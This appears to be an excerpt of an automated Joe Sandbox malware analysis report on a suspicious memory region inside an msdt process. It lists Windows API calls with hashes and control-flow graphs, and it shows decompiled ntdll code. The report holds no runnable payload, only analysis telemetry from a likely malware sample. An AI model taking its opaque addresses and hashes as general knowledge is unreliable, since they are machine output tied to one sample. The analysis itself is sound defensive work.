                          • Source File: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_3130000_msdt.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID: .z`
                          • API String ID: 3298025750-1441809116
                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                          • Instruction ID: 6fa3b8e5c86543c19dfd59071bacbe9c444e35b6c676c564e0f4cfea83afb0fc
                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                          • Instruction Fuzzy Hash: 06E04FB52003086BD714DF59CC48EA777ACEF88750F014554FE085B241C630F910CAF0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 468 3137290-31372da call 314a150 call 314ad30 call 3139b50 call 3143e60 477 313730e-3137312 468->477 478 31372dc-31372ee PostThreadMessageW 468->478 479 31372f0-313730a call 31392b0 478->479 480 313730d 478->480 479->480 480->477
                          APIs
                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 031372EA
                          Memory Dump Source
                          • Source File: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_3130000_msdt.jbxd
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID:
                          • API String ID: 1836367815-0
                          • Opcode ID: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
                          • Instruction ID: 97d4103a2011f538d7775e4330062a0d571ea721bf1521f0782d8511c9469e8f
                          • Opcode Fuzzy Hash: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
                          • Instruction Fuzzy Hash: 33018F75A803287BE721EA949C02FBE776C9B09A51F050118FF04BE1C0E7E4690647F6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 483 3139b50-3139b79 call 314af80 486 3139b7b-3139b7e 483->486 487 3139b7f-3139b8d call 314b3a0 483->487 490 3139b8f-3139b9a call 314b620 487->490 491 3139b9d-3139bae call 3149730 487->491 490->491 496 3139bb0-3139bc4 LdrLoadDll 491->496 497 3139bc7-3139bca 491->497 496->497
                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 03139BC2
                          Memory Dump Source
                          • Source File: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_3130000_msdt.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                          • Instruction ID: 17ef55a9454d758797ae227295585788f0c55c3c85c21efe90ddcc2c52e816b7
                          • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                          • Instruction Fuzzy Hash: 50011EB9D4020DABDF10EBA4DC41F9EB7789F58208F048195E9089B244F771E714CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 498 3148970-31489c8 call 31491f0 CreateProcessInternalW
                          APIs
                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 031489C4
                          Memory Dump Source
                          • Source File: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_3130000_msdt.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateInternalProcess
                          • String ID:
                          • API String ID: 2186235152-0
                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                          • Instruction ID: 48b947407aafdc4a90e0168f4a8aad85c3791462ca3289370cfdb180413572c6
                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                          • Instruction Fuzzy Hash: 1001AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 501 3147433-3147445 503 3147447-314744e 501->503 504 314744f-3147468 call 3143e60 501->504 503->504 507 3147487-314748c 504->507 508 314746a-3147486 call 314d562 CreateThread 504->508
                          APIs
                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0313CD00,?,?), ref: 0314747C
                          Memory Dump Source
                          • Source File: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_3130000_msdt.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateThread
                          • String ID:
                          • API String ID: 2422867632-0
                          • Opcode ID: b7baa9da6356c8cb2ef3e8ed94b69d28a052157f0b71a4f061d19558e224dc9a
                          • Instruction ID: 36e31ac0d4a8f8343b5119ced718e41eae0739308857f477b01789a0b6bb1f58
                          • Opcode Fuzzy Hash: b7baa9da6356c8cb2ef3e8ed94b69d28a052157f0b71a4f061d19558e224dc9a
                          • Instruction Fuzzy Hash: 4FF0EC7A3403407BE731A2B8EC03F7B7A59D785B10F5D0419F259EF1C1DA95F4014295
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 511 3147440-314745b 512 3147461-3147468 511->512 513 314745c call 3143e60 511->513 514 3147487-314748c 512->514 515 314746a-3147486 call 314d562 CreateThread 512->515 513->512
                          APIs
                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0313CD00,?,?), ref: 0314747C
                          Memory Dump Source
                          • Source File: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_3130000_msdt.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateThread
                          • String ID:
                          • API String ID: 2422867632-0
                          • Opcode ID: 0d38f4751805db27582d5cf81cda9713cc2f7bc7b29633d887c1cd8b950a6990
                          • Instruction ID: 05f33d34fe032a4b6a7a89ead1b6230db56ee98fbd6583131b0d7c94e75dd923
                          • Opcode Fuzzy Hash: 0d38f4751805db27582d5cf81cda9713cc2f7bc7b29633d887c1cd8b950a6990
                          • Instruction Fuzzy Hash: 34E092373813143BE730A59DAC02FA7B39CCB95B20F590426FA4DEB2C1DA95F80142A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0313CFD2,0313CFD2,?,00000000,?,?), ref: 03148A90
                          Memory Dump Source
                          • Source File: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_3130000_msdt.jbxd
                          Yara matches
                          Similarity
                          • API ID: LookupPrivilegeValue
                          • String ID:
                          • API String ID: 3899507212-0
                          • Opcode ID: 4899002aec1d553de8b2250a1a172dc3e6787a7e04ac71a638a8ae78c6133e52
                          • Instruction ID: f325310abb3cc90aa49f8e2ce3cdfc66649f1cff6bdd20603b21fb390f1ccff6
                          • Opcode Fuzzy Hash: 4899002aec1d553de8b2250a1a172dc3e6787a7e04ac71a638a8ae78c6133e52
                          • Instruction Fuzzy Hash: AEE065B52042846BD720DF58CC44ED73B69EF85224F148159FE595B692C634D400C7B5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0313CFD2,0313CFD2,?,00000000,?,?), ref: 03148A90
                          Memory Dump Source
                          • Source File: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_3130000_msdt.jbxd
                          Yara matches
                          Similarity
                          • API ID: LookupPrivilegeValue
                          • String ID:
                          • API String ID: 3899507212-0
                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                          • Instruction ID: efaf22f42b9ec136a223e80ca15349499650f5ca4bf1d3cdda364782d4862b51
                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                          • Instruction Fuzzy Hash: D0E01AB52002086BDB10DF49CC84EE737ADAF88650F018154BE085B241CA30E8108BF5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlAllocateHeap.NTDLL(03143546,?,03143CBF,03143CBF,?,03143546,?,?,?,?,?,00000000,00000000,?), ref: 031488ED
                          Memory Dump Source
                          • Source File: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_3130000_msdt.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                          • Instruction ID: 4190c494437434b878478496c16bfce0d8a94b663a5c760f769078d76c0ee419
                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                          • Instruction Fuzzy Hash: EEE012B5200208ABDB14EF99CC84EA777ACAF88660F118558BE085B242C630F910CAB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetErrorMode.KERNELBASE(00008003,?,?,03137C93,?), ref: 0313D46B
                          Memory Dump Source
                          • Source File: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_3130000_msdt.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorMode
                          • String ID:
                          • API String ID: 2340568224-0
                          • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                          • Instruction ID: 8cc461ac7179023b5d73d657f878d5ea8fe902ec7266e9d1c7c26d2fed53dd94
                          • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                          • Instruction Fuzzy Hash: 1AD0A7757503087BE610FAA89C03F2672CC5B49A10F494064F94DEB3C3DA50F4104161
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                          • Associated: 0000000C.00000002.608600190.000000000556B000.00000040.00000800.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_5450000_msdt.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 426d1901890319eaf135cf90c8ecb6a72ad02a62ae6f32c96c4ccd6f3e739d38
                          • Instruction ID: e918d9795ae97d9bbd4f8fe3212eb740f9383a706f7d3f5f9855bb2fbab9d68b
                          • Opcode Fuzzy Hash: 426d1901890319eaf135cf90c8ecb6a72ad02a62ae6f32c96c4ccd6f3e739d38
                          • Instruction Fuzzy Hash: C1B09B71D014C5C5E751D7604648B677D1177D0741F66C0A7D2020791A4778C091F5B5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 53%
                          			E0550FDDA(intOrPtr* __edx, intOrPtr _a4) {
                          				void* _t7;
                          				intOrPtr _t9;
                          				intOrPtr _t10;
                          				intOrPtr* _t12;
                          				intOrPtr* _t13;
                          				intOrPtr _t14;
                          				intOrPtr* _t15;
                          
                          				_t13 = __edx;
                          				_push(_a4);
                          				_t14 =  *[fs:0x18];
                          				_t15 = _t12;
                          				_t7 = E054BCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                          				_push(_t13);
                          				E05505720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                          				_t9 =  *_t15;
                          				if(_t9 == 0xffffffff) {
                          					_t10 = 0;
                          				} else {
                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                          				}
                          				_push(_t10);
                          				_push(_t15);
                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                          				return E05505720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                          			}










                          0x0550fdda
                          0x0550fde2
                          0x0550fde5
                          0x0550fdec
                          0x0550fdfa
                          0x0550fdff
                          0x0550fe0a
                          0x0550fe0f
                          0x0550fe17
                          0x0550fe1e
                          0x0550fe19
                          0x0550fe19
                          0x0550fe19
                          0x0550fe20
                          0x0550fe21
                          0x0550fe22
                          0x0550fe25
                          0x0550fe40

                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0550FDFA
                          Strings
                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0550FE01
                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0550FE2B
                          Memory Dump Source
                          • Source File: 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                          • Associated: 0000000C.00000002.608600190.000000000556B000.00000040.00000800.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_5450000_msdt.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                          • API String ID: 885266447-3903918235
                          • Opcode ID: b43240d4524c0fabb87fd91636f6a23b4c9323ab1c361e2501218e1d9ed92473
                          • Instruction ID: d378e134486ff9396a085d920ba082c22ab71adafcd050a6fb48a7c8339941d3
                          • Opcode Fuzzy Hash: b43240d4524c0fabb87fd91636f6a23b4c9323ab1c361e2501218e1d9ed92473
                          • Instruction Fuzzy Hash: 04F0F676244201BFE6201A55DC4AF73BB6AFB84770F241315F628565D1EAA2F82096F1
                          Uniqueness

                          Uniqueness Score: -1.00%